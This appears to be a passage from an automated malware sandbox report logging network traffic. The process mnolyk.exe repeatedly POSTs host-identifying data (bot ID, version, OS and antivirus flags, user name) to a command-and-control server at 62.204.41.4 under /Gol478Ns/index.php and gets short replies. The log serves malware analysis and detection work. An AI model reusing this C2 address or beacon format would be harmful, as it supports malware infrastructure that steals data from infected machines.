                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      421192.168.2.75011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:55.305221081 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.369998932 CET536INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      422192.168.2.75011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:55.559827089 CET537OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.626091957 CET537INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      423192.168.2.75011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:55.823225021 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.888909101 CET538INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      424192.168.2.75011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:56.055732012 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.118506908 CET539INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      425192.168.2.75012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:56.307441950 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.370866060 CET540INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      426192.168.2.75012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:56.541604042 CET541OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.608396053 CET541INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      427192.168.2.75012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:56.823302031 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.890953064 CET542INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      428192.168.2.75012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:57.096759081 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.161602974 CET543INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      429192.168.2.75012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:57.344638109 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.409598112 CET544INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      43192.168.2.74973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:12.033255100 CET147OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.100027084 CET147INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      430192.168.2.75012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:57.600770950 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.666326046 CET545INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      431192.168.2.75012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:57.855566978 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.920010090 CET546INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      432192.168.2.75012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:58.089433908 CET547OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.156618118 CET547INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      433192.168.2.75012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:58.335870028 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.398947954 CET548INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      434192.168.2.75012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:58.570310116 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.633084059 CET549INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      435192.168.2.75013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:58.812896967 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:58.875322104 CET550INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      436192.168.2.75013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:59.066086054 CET551OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.130352020 CET551INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      437192.168.2.75013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:59.313659906 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.378097057 CET552INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      438192.168.2.75013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:59.557976961 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:59.622168064 CET553INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      439192.168.2.75013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:59.789777040 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
